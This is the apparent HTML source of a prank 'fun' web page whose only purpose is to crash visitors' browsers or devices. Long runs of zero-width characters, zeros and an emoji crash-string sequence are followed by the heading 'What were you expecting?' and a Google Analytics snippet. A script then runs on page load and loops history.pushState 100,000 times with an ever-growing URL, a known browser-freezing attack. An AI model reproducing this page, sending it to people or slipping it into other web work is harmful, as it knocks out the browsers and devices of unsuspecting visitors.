‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍ 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000🏳0🌈   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000 000000000000000000000 000000000000000000000000000000 000000000000000000000 000000000000000000000   000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000   000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000subject_crash_device=true000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000🏳0🌈   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000 000000000000000000000 000000000000000000000
        <h1>What were you expecting?</h1>
        <script>
            (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
                    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
                    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
                    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

                    ga('create', 'UA-60737367-1', 'auto');
                    ga('send', 'pageview');
                </script>
                <script>
                    var total = "";
                    for( var i = 0; i < 100000; i++ ) {
                        total = total + i.toString();
                        history.pushState(0,0, total );
                    }
                </script>
            </body>https://bytewolfgaming.github.io/fun
